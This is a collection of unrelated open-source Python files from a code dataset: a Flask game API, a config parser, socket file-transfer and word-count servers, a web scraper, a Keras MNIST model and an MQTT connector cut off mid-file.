app.run(debug=True)\n","repo_name":"eugeniu1994/WebApp_test","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"32507669947","text":"import argparse\nimport flask\nimport re\n\nimport db\nimport error\nimport validation\n\npet_name_regex = re.compile(\"^[A-Za-z0-9]+$\")\n\napp = flask.Flask(__name__)\n\nMAX_PET_NAME_LENGTH = 100\n\nNEW_PET_REQUEST_SCHEMA = {\n \"type\": \"object\",\n \"properties\": {\n \"name\": {\n \"type\": \"string\"\n },\n \"strength\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n },\n \"agility\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n },\n \"wit\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n },\n \"senses\": {\n \"type\": \"number\",\n \"minimum\": 0,\n \"maximum\": 1\n }\n },\n \"required\": [\"name\", \"strength\", \"agility\", \"wit\", \"senses\"]\n}\n\n# from http://flask.pocoo.org/docs/0.11/patterns/apierrors/\n@app.errorhandler(error.InvalidUsage)\n@app.errorhandler(error.NotFound)\ndef handle_error(error):\n response = flask.jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n# from http://flask.pocoo.org/docs/0.11/patterns/sqlite3/\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(flask.g, '_database', None)\n if db is not None:\n db.close()\n\ndef valid_pet_name(petname):\n return pet_name_regex.match(petname) and len(petname) <= MAX_PET_NAME_LENGTH\n\n# The sum of the attributes must be <= 1.0\ndef valid_new_pet(pet):\n return valid_pet_name(pet[\"name\"]) and \\\n (pet[\"strength\"] +\n pet[\"agility\"] +\n pet[\"wit\"] +\n pet[\"senses\"]) <= 1.0\n\n@app.route(\"/new-pet\", methods=[\"POST\"])\ndef new_pet():\n\n request_data = validation.validate_json(flask.request,\n \"NEW_PET_REQUEST_SCHEMA\", NEW_PET_REQUEST_SCHEMA)\n\n conn = db.get_db(app)\n cursor = conn.cursor()\n\n cursor.execute(\"SELECT name FROM Pets WHERE name = ?;\",\n (request_data[\"name\"], ))\n\n pet = cursor.fetchone()\n\n if pet != None:\n raise error.InvalidUsage(\"A pet with the name '%s' already exists.\" %\n request_data[\"name\"])\n\n if not valid_new_pet(request_data):\n message = (\"The sum of (strength, agility, wit, senses) must be \" +\n \"<= 1.0 AND the length of name must be <= %s \" +\n \"AND the name may only contain the characters [A-Za-z0-9].\") % \\\n MAX_PET_NAME_LENGTH\n\n raise error.InvalidUsage(message)\n\n cursor.execute('''\n INSERT INTO Pets(name, strength, agility, wit, senses, wins, losses,\n experience)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?);''',\n (request_data[\"name\"],\n request_data[\"strength\"],\n request_data[\"agility\"],\n request_data[\"wit\"],\n request_data[\"senses\"],\n 0, 0, 0))\n\n conn.commit()\n\n return ''\n\n@app.route(\"/get-pet/\", methods=[\"GET\"])\ndef get_pet(petname):\n\n if not valid_pet_name(petname):\n message = \"The name of the pet must be <= %s\" % MAX_PET_NAME_LENGTH\n\n raise error.InvalidUsage(message)\n\n conn = db.get_db(app)\n cursor = conn.cursor()\n\n cursor.execute(\"SELECT name, strength, agility, wit, senses, wins, \" +\n \"losses, experience FROM Pets where name = ?;\", (petname, ))\n\n data = cursor.fetchone()\n\n if data == None:\n raise error.NotFound(\"A pet with the name '%s' does not exist.\" %\n petname)\n\n response = {\n \"name\": data[0],\n \"strength\": data[1],\n \"agility\": data[2],\n \"wit\": data[3],\n \"senses\": data[4],\n \"wins\": data[5],\n \"losses\": data[6],\n \"experience\": data[7]\n }\n\n return flask.json.dumps(response)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(prog='management.py')\n\n parser.add_argument('--db', nargs='?', help='Filename for the database',\n default=\"database.db\", dest=\"database_filename\")\n\n parser.add_argument('--port', nargs='?', help=\"The port to run the \" + \\\n \"server on\", default=5000, dest=\"port\", type=int)\n\n args = parser.parse_args()\n\n app.config['DATABASE'] = args.database_filename\n\n app.run(\"0.0.0.0\", args.port)\n","repo_name":"mikegagnon/battle-pets","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33346449607","text":"def readline(line):\n \"\"\"\n Read one line from the *config* file, if the line is not tagged as a comment\n\n Parameters\n ----------\n line : str\n \tA line of the *config* file\n\n Returns\n -------\n key_name : str \n \tKeyname of the parameter. The name before the \"=\" symbol. It returns \"#\" if the line is commented.\n value : str\n \tValue of the parameter as written in the *config* file. It returns \"#\" if the line is commented.\n \"\"\"\n if line==None:\n return '#','#'\n elif line[0]=='#':\n return '#','#'\n elif line[0]=='':\n return '#','#'\n else:\n tokens=line.split('=')\n if len(tokens)==2:\n return tokens[0],tokens[1].strip()\n else:\n return '#','#' \n\ndef loadData(file_path):\n \"\"\"\n Recollect the model parameters from the *config* file specified by **file_path**.\n \n Parameters\n ----------\n filepath : str\n \tThe path with the directory and filename of the __config__ file.\n \t\n Returns\n -------\n config : dict\n \tA dictionary with the required parameters for the Kuramoto model.\n \tUsing the template of the __config__ file, there will not be any warning.\n \tIf you __config__ file lacks one o several parameters, it will be an error.\n \tFuture release: You can specifiy only the required parameters to change, if there is not in the __config__ file, the model is instatiated with the default parameters. \n \"\"\"\n config={}\n with open(file_path) as file:\n while True:\n line=file.readline()\n if not line:\n break\n key,data=readline(line)\n if key== 'struct_connectivity' or key=='delay_matrix':\n if key=='AAL90':\n config[key]=None\n else:\n config[key]=data\n continue\n if key=='experiment_name':\n config[key]=data\n continue\n if key=='nat_freqs':\n if data=='' or data==' ':\n config[key]=None\n else:\n config[key]=data\n continue\n if key=='ForcingNodes':\n if data=='' or data==' ':\n config[key]=None\n else:\n config[key]=data\n continue\n if key=='random_nat_freq': \n data=eval(data)\n config[key]=data\n continue\n if key=='max_workers' or key =='seed' or key =='n_nodes':\n data=int(data)\n config[key]=data\n continue\n elif key=='#':\n continue\n else:\n data=float(data)\n config[key]=data\n continue\n \n return config\n\n","repo_name":"FelipeTorr/KuramotoNetworksPackage","sub_path":"model/parserConfig.py","file_name":"parserConfig.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"73858308387","text":"# !/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n#\t✪ H4WK3yE乡\n#\tMohd. Farhan Tahir\n#\tIndian Institute Of Information Technology and Management,Gwalior\n\n# Question Link\n\"\"\"\nhttps://www.hackerrank.com/challenges/candies/problem\n\"\"\"\n\n\nimport sys\n\ninf = float(\"inf\")\nmod = 1000000007\n\n\ndef get_array():\n return list(map(int, sys.stdin.readline().split()))\n\n\ndef get_ints():\n return map(int, sys.stdin.readline().split())\n\n\ndef input():\n return sys.stdin.readline()\n\n# ///==========MAIN=============///\n\n\ndef main():\n n = int(input())\n arr = [0]*n\n for i in range(n):\n arr[i] = int(input())\n forward = [1]*n\n backward = [1]*n\n for i in range(1, n):\n if arr[i] > arr[i-1]:\n forward[i] = 1+forward[i-1]\n else:\n forward[i] = 1\n for i in range(n-2, -1, -1):\n if arr[i] > arr[i+1]:\n backward[i] = 1+backward[i+1]\n else:\n backward[i] = 1\n total = 0\n for i in range(n):\n total += max(forward[i], backward[i])\n print(total)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"h4wwk3ye/code","sub_path":"Hackerrank/Dynamic Programming/candies.py","file_name":"candies.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12120636232","text":"# server\nimport socket, os, hashlib\n \nserver = socket.socket()\nserver.bind(('localhost',2222))\n \nserver.listen()\n \nwhile True:\n conn,addr = server.accept()\n print(\"一个新的连接:\",addr)\n while True:\n print(\"等待新指令\")\n data = conn.recv(1024)\n if not data:\n print(\"客户端已经断开\")\n break\n cmd, file_name = data.decode().split() # 接收客户端发过来的命令和文件名\n print(\"执行指令:%s, 文件名:%s\" % (cmd, file_name))\n if os.path.isfile(file_name): \n m = hashlib.md5() # 生成MD5对象\n with open(file_name, \"rb\") as f:\n file_size = os.stat(file_name).st_size # 获取一个文件的大小:os.stat(文件名).st_size\n conn.send(str(file_size).encode())\n conn.recv(1024) # 等待客户端确认,防止发生粘包\n for line in f:\n m.update(line) # 不断更新计算MD5值\n conn.send(line)\n print(\"md5值\", m.hexdigest())\n conn.recv(1024) # 等待客户端确认,防止发生粘包,准备发送MD5值\n conn.send(m.hexdigest().encode()) # 发送MD5值给客户端\n print(\"send done\")\nserver.close()\n\n# client\nimport socket\n \nclient = socket.socket()\n \nclient.connect((\"localhost\", 2222))\n \nwhile True:\n cmd = input(\">>:\").strip()\n if len(cmd) == 0:continue\n print(cmd)\n if cmd.startswith(\"get\"):\n client.send(cmd.encode(\"utf-8\")) # 发送下载命令和文件名\n file_size = client.recv(1024) # 接收文件大小\n print(\"即将接收数据大小:\", file_size.decode())\n client.send(\"客户端准备好接收数据内容了\".encode())\n revived_size = 0\n file_name = cmd.split()[1] # 文件名\n m = hashlib.md5() # 生成MD5对象\n with open(file_name + \"_new\", \"wb\",) as f:\n while revived_size < int(file_size.decode()):\n if int(file_size.decode()) - revived_size > 1024: # 只要剩余文件字节大于1024字节,就默认最大值接收\n size = 1024\n else:\n size = int(file_size.decode()) - revived_size # 最后一次,剩多少收多少\n print(\"last receive:\", size)\n file_data = client.recv(size)\n revived_size += len(file_data)\n m.update(file_data) # 不断更新计算接收数据的文件值\n f.write(file_data)\n else:\n print(file_size, revived_size)\n client_md5_value = m.hexdigest() # 生成接收数据的MD5值16进制形式\n server_md5_value = client.recv(1024) # 接收服务端的MD5值\n print(\"client接收文件MD5值:%s,server发送文件的MD5值:%s\" % (client_md5_value, server_md5_value))\nclient.close()","repo_name":"syntomic/summary","sub_path":"Languages_and_Algorithms/languages/python/socket/FTP.py","file_name":"FTP.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31572687896","text":"from frappe.model.document import Document\nimport frappe\nfrom frappe import get_doc, db, msgprint, get_meta\nimport requests\nfrom json import dumps\nfrom hashlib import md5\nfrom datetime import datetime\nfrom urllib.parse import urlencode\n\nclass FieldMapping(Document):\n\t@frappe.whitelist()\n\tdef get_fields(self, module):\n\t\tconfig = get_doc('VtigerCRM Settings')\n\t\tconfig.get_sessionname()\n\t\tvalues = {'sessionName': config.sessionname, 'operation': 'describe', 'elementType': module}\n\t\tparams = urlencode(values)\n\t\turl = 'http://' + config.host + '/' + config.path + '/webservice.php?' + params\n\t\tresponse = requests.get(url)\n\t\tif response.json()['success'] == True:\n\t\t\tfields = response.json()['result']['fields']\n\t\t\tlabel = [field['label'] + ' (' + field['name'] + ')' for field in fields]\n\t\t\treturn label\n\t\telse:\n\t\t\tmsgprint(\n\t\t\t\tmsg=response.json()['error']['message'],\n\t\t\t\ttitle=response.json()['error']['code'],\n\t\t\t)\n\n\tdef get_module_vtigercrm(self, module, fieldDocType, fieldModule):\n #ts = datetime.timestamp(datetime.now())\n #values = {'operation': 'sync', 'sessionName': self.values['sessionName'], 'elementType': 'Contacts', 'modifiedTime': ts-5000}\n #last_update = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t# fieldList = \"firstname,lastname\"\n\t\tconfig = get_doc('VtigerCRM Settings')\n\t\tconfig.on_update()\n\t\tvalues = {'operation': 'query', 'sessionName': config.sessionname}\n\t\tparams = urlencode(values)\n\t\turl = 'http://' + config.host + '/' + config.path + '/webservice.php?' + params\n\t\tresults = []\n\t\ti = 0\n\t\tlimit = 100\n\t\twhile True:\n\t\t\tquery = {'query': \"SELECT \" + ','.join(fieldModule) + \" FROM \" + module + \" ORDER BY modifiedtime DESC LIMIT \" + str(i + 1) + \",\" + str(i + 100) + \";\"}\n\t\t\turl_query = url + \"&\" + urlencode(query)\n\t\t\tresponse = requests.get(url_query)\n\t\t\tlimit = len(response.json()['result'])\n\t\t\tif limit == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"i ------------------------------------> \" + str(i))\n\t\t\t\tresponse.raise_for_status()\n\t\t\t\tif response.status_code != 204:\n\t\t\t\t\tresults = response.json()['result']\n\t\t\t\t\ti += 100\n\t\t\t\t\tfor result in results:\n\t\t\t\t\t\tlistDocType = {'doctype':'Contact'}\n\t\t\t\t\t\tfor i in range(0, len(fieldDocType)):\n\t\t\t\t\t\t\tlistDocType[fieldDocType[i - 1]] = result[fieldModule[i - 1]]\n\t\t\t\t\t\tprint(listDocType)\n\t\t\t\t\t\tself.create_contact(listDocType)\n\t\t\t\tbreak\n\n\t@frappe.whitelist()\n\tdef create_contact(self, listDocType):\n\t\tget_doc(listDocType).insert(ignore_permissions=True)\n\n\tdef on_update(self):\n\t\tif self.enabled:\n\t\t\tlfContact_VT = []\n\t\t\tlfContact_EN = []\n\t\t\tfor relationField in self.get('contacts_fields'):\n\t\t\t\tlfContact_VT.append(relationField.vtigercrm_contact[relationField.vtigercrm_contact.find('(') + 1:len(relationField.vtigercrm_contact)-1])\n\t\t\t\tlfContact_EN.append(relationField.erpnext_contact[relationField.erpnext_contact.find('(') + 1:len(relationField.erpnext_contact)-1])\n\t\t\tself.get_module_vtigercrm('Contacts', lfContact_EN, lfContact_VT)\n\t\t\t\t#results = self.get_module_vtigercrm('Contacts', fieldList)\n\t\t\tif self.schedule:\n\t\t\t\t\"\"\"event = frappe.get_doc(\n\t\t\t\t\t{\n\t\t\t\t\t\t\"doctype\": \"Event\",\n\t\t\t\t\t\t\"owner\": self.owner,\n\t\t\t\t\t\t\"subject\": 'description',\n\t\t\t\t\t\t\"description\": 'description',\n\t\t\t\t\t\t\"starts_on\": 'cstr(key[\"scheduled_date\"])' + \" 10:00:00\",\n\t\t\t\t\t\t\"event_type\": \"Private\",\n\t\t\t\t\t}\n\t\t\t\t)\n\t\t\t\tevent.add_participant(self.doctype, self.name)\n\t\t\t\tevent.insert(ignore_permissions=1)\"\"\"\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tpass\n","repo_name":"mrrocky2023/mrrockyfinal","sub_path":"mrrocky/mrrocky/doctype/field_mapping/field_mapping.py","file_name":"field_mapping.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11502409673","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport datetime\nfrom mysqlwith import connector\n\n\nclass naver_now:\n BASE_URI = 'https://entertain.naver.com'\n PAGE_URI = BASE_URI + (\n '/now'\n '?sid=%(sid)s'\n '&date=%(date)s'\n '&page=%(page)s'\n )\n\n\n def __init__(self):\n self.sid = '7a5'\n self.date = datetime.date.today()\n self.page = 1\n self.max = 100\n self.contents = []\n self.mysql_config = {\n 'db': 'apps',\n 'host': 'localhost',\n 'user': 'rusk',\n 'passwd': 'alsueopseo'\n }\n\n\n def fetch_posts(self):\n self.fetch_from_db()\n self.fetch_timeline()\n self.fetch_texts()\n\n\n def fetch_from_db(self):\n with connector(self.mysql_config) as connect:\n cursor = connect.cursor()\n cursor.execute('select uri from navernow order by id desc limit 1')\n self.latest_uri = cursor.fetchone()[0]\n cursor.close()\n\n\n def write_to_db(self):\n with connector(self.mysql_config) as connect:\n cursor = connect.cursor()\n for item in reversed(self.contents):\n title = item['title'].replace('\\'', u'\\\\\\'')\n text = item['text'].replace('\\'', u'\\\\\\'')\n cursor.execute(\"insert into navernow (uri, title, time, text, thumbnail) values ('%s', '%s', '%s', '%s', '%s')\"\n % (item['uri'], title, item['time'], text, item['thumbnail']))\n cursor.close()\n\n\n def fetch_timeline(self):\n uri = self.PAGE_URI % {\n 'sid': self.sid,\n 'date': self.date,\n 'page': self.page\n }\n res = requests.get(uri)\n soup = BeautifulSoup(res.text, 'html.parser')\n lst = soup.select_one('.news_lst')\n soup = BeautifulSoup(str(lst), 'html.parser')\n items = soup.select('li')\n if items[0].string == '기사가 없습니다.':\n return\n for item in items:\n content = {\n 'title': item.select_one('.tit').get_text(),\n 'uri': item.select_one('.tit')['href'],\n 'ago': item.select_one('em').get_text()\n }\n if content['uri'] == self.latest_uri:\n print('Listed %s Posts' % len(self.contents))\n return\n try:\n content['thumbnail'] = item.select_one('img')['src']\n except TypeError:\n content['thumbnail'] = 'NULL'\n self.contents.append(content)\n print('Listed %s Posts' % len(self.contents))\n if len(self.contents) >= self.max:\n return\n time.sleep(0.1)\n self.page += 1\n self.fetch_timeline()\n\n\n def fetch_texts(self):\n count = 0\n for item in self.contents:\n count += 1\n uri = self.BASE_URI + item['uri']\n res = requests.get(uri)\n soup = BeautifulSoup(res.text, 'html.parser')\n item['time'] = soup.select_one('.article_info em').get_text()\n text = soup.select_one('#articeBody').get_text()\n text = text.replace('\\n', '')\n item['text'] = text.replace('\\t', '')\n print('Fetched %s %s / %s' % (uri, count, len(self.contents)))\n time.sleep(0.1)\n\n\ndef main():\n contents = naver_now()\n contents.fetch_posts()\n contents.write_to_db()\n print('Done')\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"dytlzl/navernow_scraper","sub_path":"navernowdb.py","file_name":"navernowdb.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29703084014","text":"from sklearn.naive_bayes import GaussianNB\nimport pandas as pd\nimport numpy as np\nimport statistics\nnp.set_printoptions(precision=2)\n\n\ndef main():\n # cross_validate()\n split_data()\n\n\ndef split_data():\n data = load_data()\n bagged_data = data.sample(n=data.shape[0], replace=True)\n classes = bagged_data.iloc[:, 0]\n attributes = bagged_data.iloc[:, 1:]\n # print(attributes[:15])\n number_of_instances = len(bagged_data)\n num_folds = 5\n fold_size = number_of_instances / num_folds\n accuracies = []\n for i in range(5):\n train_attributes = pd.concat([attributes.iloc[:(int((num_folds - (i + 1)) * fold_size))],\n attributes.iloc[int((num_folds - i) * fold_size):]])\n\n train_classes = pd.concat([classes.iloc[:(int((num_folds - (i + 1)) * fold_size))],\n classes.iloc[int((num_folds - i) * fold_size):]])\n\n test_attributes = attributes.iloc[(int((num_folds - (i + 1)) * fold_size))\n :(int((num_folds - i) * fold_size))]\n\n test_classes = classes.iloc[(int((num_folds - (i + 1)) * fold_size))\n :(int((num_folds - i) * fold_size))]\n print(\"\\t\\t\\t\\tFOLD %d\\n\" % (i + 1))\n accuracies.append(float(predict(train_attributes, train_classes, test_attributes, test_classes)))\n\n print('Mean is: %.2f%%' % (statistics.mean(accuracies)))\n print('Standard Deviation is %f' % (statistics.pstdev(accuracies)))\n\n\ndef predict(train_attributes, train_classes, test_attributes, test_classes):\n gnb = GaussianNB()\n data = load_data()\n y_pred = gnb.fit(train_attributes, train_classes).predict(test_attributes)\n data_size = float(test_attributes.shape[0])\n correctly_predicted = (test_classes != y_pred).sum()\n print(\"Number of mislabeled points out of a total %d points : %d\"\n % (data_size, correctly_predicted))\n\n inaccuracy = (correctly_predicted / float(data_size)) * 100.\n print(\"Accuracy is: %.2f\" % (100 - inaccuracy))\n print('\\n')\n\n return 100 - inaccuracy\n\n\ndef load_data():\n data = pd.read_csv('letter-recognition.data.csv')\n return data\n\n\nmain()\n","repo_name":"emkayDauda/MachineLearningAssignment","sub_path":"Naive/BaggedBayes.py","file_name":"BaggedBayes.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3879616797","text":"\r\nimport socket\r\n#biblioteca para converter qualquer tipo de dado em binário\r\nimport marshal\r\n#Biblioteca para o uso de threadings\r\nimport threading\r\n#Biblioteca para utilizar a função encoding para utilização de caracteres especiais no ficheiro\r\nimport codecs\r\n#Biblioteca para trabalhar com datas e horas\r\nimport datetime\r\n\r\n# Numero de porta na qual o servidor estara esperando Ligações.\r\nserverPort = 7000\r\n# Criar o socket\r\nsocketServidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# Associa o socket á porta escolhida, O Primeiro argumento vazio indica\r\n# que aceitamos ligações em qualquer interface de rede desse host\r\nsocketServidor.bind(('', serverPort))\r\n# Configura o socket para aceitar ligações\r\nsocketServidor.listen()\r\n\r\n#Lista para envio de palavras para o cliente\r\nlista_palavras_cliente = []\r\n\r\n#Função principal que vai ser chamada no menu no final do programa\r\ndef main(path):\r\n #Abertura do ficheiro, o bloco Try permite que o utilizador receba uma mensagem personalizada caso não seja possivel abrir o ficheiro\r\n try:\r\n file = open(f\"{path}\", 'r',encoding='utf-8')\r\n except:\r\n print(\"\\n[Servidor]Erro ao abrir o ficheiro, O programa vai terminar\")\r\n return \"[Cliente]Erro ao abrir o ficheiro, O programa vai terminar\"\r\n exit()\r\n\r\n #leitura do ficheiro para uma lista\r\n texto = file.read().lower()\r\n\r\n #Fecha a ligação ao ficheiro\r\n file.close()\r\n\r\n #Cria uma lista com caracteres\r\n pont_list_chr=[]\r\n\r\n def chr_list(begin, end):\r\n #lê um inteiro e converte em caracter, e adiciona á lista\r\n for i in range(begin, end):\r\n pont_list_chr.append(chr(i))\r\n\r\n #Range de caracteres na tabela ASCII\r\n chr_list(33,48)\r\n chr_list(58,65)\r\n chr_list(91,97)\r\n chr_list(123,127)\r\n\r\n #Função para remover todos os caracteres especiais\r\n def remove_char(text): \r\n\r\n for char in pont_list_chr:\r\n text = text.replace(char, '')\r\n return text\r\n\r\n #Atribui a string a variavel texto mas sem os caracteres especiais\r\n texto = remove_char(texto)\r\n\r\n #Função para converter a String sem os caracteres especiais em lista\r\n #A função strip() remove os espaços no inicio e fim da string\r\n def convert_list(text):\r\n\r\n for line in text:\r\n line = line.strip()\r\n lista = list(text.split())\r\n return lista\r\n\r\n #Cria uma lista de palavras separadas por espaço\r\n lista_final = convert_list(texto)\r\n\r\n #Função para criar um dicionario com os pares de palavras e a sua ocorrencia no texto lido\r\n def get_words_count(lista):\r\n\r\n dic = {}\r\n counter = 0\r\n for word in lista:\r\n if word in dic:\r\n dic[word] = dic[word] + 1\r\n else:\r\n dic[word] = 1\r\n \r\n return dic\r\n\r\n #Cria um novo dicionário com a contagem das palavras\r\n dicionario = get_words_count(lista_final)\r\n\r\n #Função para organizar o dicionário e fazer print ordenado\r\n def order_score(dic):\r\n '''ordenação do dicionário com função lambda em que a comparação é feita com o valor x[1]\r\n utilizamos o reverse=True para alterar a ordem do sorted()\r\n referencia para a função lambda. (https://docs.python.org/3/reference/expressions.html#lambda) \r\n (https://towardsdatascience.com/two-simple-method-to-sort-a-python-dictionary-a7907c266dba)'''\r\n\r\n dic = sorted(dic.items(), key=lambda x: x[1], reverse=True)\r\n\r\n # Ciclo para percorrer o dicionario, mostra a palavras e o valor, das 20 mais utilizadas\r\n lugar = 1\r\n\r\n while lugar < 20:\r\n for i in dic[:20]: \r\n lista_palavras_cliente.append(f\"{lugar} º - {i[0]} - {i[1]} ocorrências\")\r\n lugar += 1 \r\n \r\n\r\n\r\n #Execução das funções do programa\r\n order_score(dicionario) \r\n\r\n#Função que trata os pedidos dos clientes\r\ndef pedido_Cliente(socketCliente):\r\n \r\n # Recebe os dados do cliente\r\n pacote = socketCliente.recv(4096)\r\n #Descodifica os dados recebidos\r\n path = marshal.loads(pacote)\r\n\r\n #Informação dos dados recebidos pelo servidor\r\n print(f\"Servidor recebeu o pacote: {path}\")\r\n\r\n # Executa a função main para obter as palavras\r\n print(\"A processar os Dados...\")\r\n\r\n #Função para tratar as palavras\r\n main(path)\r\n\r\n # Envia mensagem de resposta para o cliente\r\n socketCliente.send(marshal.dumps(lista_palavras_cliente))\r\n print(f\"[Servidor] Lista de palavras enviadas ao cliente\")\r\n\r\n # Fecha a conexão\r\n socketCliente.close()\r\n\r\nprint ('O servidor esta pronto para receber pacotes...')\r\n\r\n# Loop infinito para tratar diversas ligações\r\nwhile True:\r\n # Aguardar nova Ligação\r\n print ('A Aguardar Ligações...')\r\n connectionSocket, addr = socketServidor.accept()\r\n\r\n\r\n #Trata o pedido do cliente com threads\r\n t = threading.Thread(target=pedido_Cliente, args=(connectionSocket,))\r\n\r\n # Inicia a thread\r\n t.start()\r\n\r\n\r\n \r\n","repo_name":"NunonCunha/Trabalho_2_PA","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"69907890786","text":"import numpy as np\nimport time\nfrom datetime import timedelta\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import CSVLogger\nimport gzip\nimport sys\nimport pickle\nimport pandas\nfrom keras.preprocessing import image\nimport cv2\nfrom keras.datasets import mnist\n\nstart_time = time.monotonic()\n\nf = gzip.open('mnist.pkl.gz', 'rb')\nif sys.version_info < (3,):\n data = pickle.load(f)\nelse:\n data = pickle.load(f, encoding='bytes')\nf.close()\n\nfrom keras.models import Sequential, load_model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.utils import np_utils\n(X_train, y_train), (X_test, y_test) = data\n\nX_train = X_train.reshape(60000, 784)\nX_test = X_test.reshape(10000, 784)\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\nX_train /= 255\nX_test /= 255\n\nn_classes = 10\n\nY_train = np_utils.to_categorical(y_train, n_classes)\nY_test = np_utils.to_categorical(y_test, n_classes)\n\nmodel = Sequential()\nmodel.add(Dense(512, input_dim=784))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(10))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')\n\nhistory = model.fit(X_train, Y_train,\n batch_size=64, epochs=10,\n verbose=2,\n validation_data=(X_test, Y_test))\n\nend_time = time.monotonic()\nprint(timedelta(seconds=end_time - start_time))\n\nimport numpy\nloss_history = history.history[\"loss\"]\nacc_history = history.history[\"acc\"]\nnumpy_loss_history = numpy.array(loss_history)\nnumpy_acc_history = numpy.array(acc_history)\nnumpy.savetxt(\"loss_history.txt\", numpy_loss_history,delimiter=\",\")\nnumpy.savetxt(\"acc_history.txt\", numpy_acc_history,delimiter=\",\")\n\nimport matplotlib.pyplot as plt\nmatplotlib.use('TkAgg')\n\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('Model accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('Model loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Test'], loc='upper left')\nplt.show()\n\nmodel.save('neuralnet.h5')\n#tesztrész\n'''\nimage_index = 334\nplt.imshow(X_test[image_index].reshape(28, 28))\npred = model.predict(X_test[image_index].reshape(1, 784))\nprint(pred.argmax())\nplt.show()\n'''\n\n","repo_name":"rajfruzsi/Gepilatas","sub_path":"Kod1/neuralnet.py","file_name":"neuralnet.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"69802379746","text":"\nimport paho.mqtt.client as mqtt # mqtt client for interacting with the databus\nimport json # storing and exchanging data via JSON file\nimport datetime # for current timestamp\nimport time # for sleep function\n\nAPP_NAME = \"Custom Connector\"\nCONFIG_FILE = '/cfg-data/config.json'\nMQTT_BROKER = 'ie-databus'\n\nglobal MQTT_USER\nglobal MQTT_PASSWORD\nglobal MQTT_METADATA_TOPIC\nglobal MQTT_DATA_READ_TOPIC\nglobal MQTT_DATA_WRITE_TOPIC\nglobal MQTT_STATUS_TOPIC\nglobal METADATA_JSON\nglobal STATUS_JSON\nglobal meta_json_string\nglobal status_json_string\n\nMQTT_USER = \"\"\nMQTT_PASSWORD = \"\"\nMQTT_METADATA_TOPIC = \"\"\nMQTT_DATA_READ_TOPIC = \"\"\nMQTT_DATA_WRITE_TOPIC = \"\"\nMQTT_STATUS_TOPIC = \"\"\nMETADATA_JSON = \"\"\nSTATUS_JSON = \"\"\nmeta_json_string = \"\"\nstatus_json_string = \"\"\n\n#============================\n# Reading Configuration\n#============================\n\ndef read_parameter(jsonfile):\n \n print(f'> Read params from {jsonfile}')\n \n with open(jsonfile) as params:\n data = json.load(params)\n return data\n\ndef publish_metadata(client):\n pub = client.publish(MQTT_METADATA_TOPIC, meta_json_string)\n #print(f\"> Published metadata on topic = {MQTT_METADATA_TOPIC} with result = {pub}\")\n\ndef publish_statusdata(client):\n pub = client.publish(MQTT_STATUS_TOPIC, status_json_string)\n #print(f\"> Published status data on topic = {MQTT_STATUS_TOPIC} with result = {pub}\")\n\n#============================\n# Callback functions\n#============================\n\n#as soon as the client connects successfully, it listens if new data is coming in the custom connector\ndef on_connect(client, userdata, flags, rc): \n if rc == 0: # 0 = connection successful \n print(f\"> {APP_NAME} connected successfully\")\n client.connected_flag = True\n \n # Publish Metadata\n publish_metadata(client)\n \n # Publish status data\n publish_statusdata(client)\n \n else:\n print(\"Connection failed!1\")\n return\n\ndef on_disconnect(client, userdata, rc):\n print(f\"{APP_NAME} is disconnected\")\n client.connected_flag = False\n \n print(\"END of LOOP\")\n client.loop_stop() \n\ndef on_message(client, userdata, message):\n print(f\"Recieved message = {message.payload} on topic = {message.topic}\")\n \n # If data is 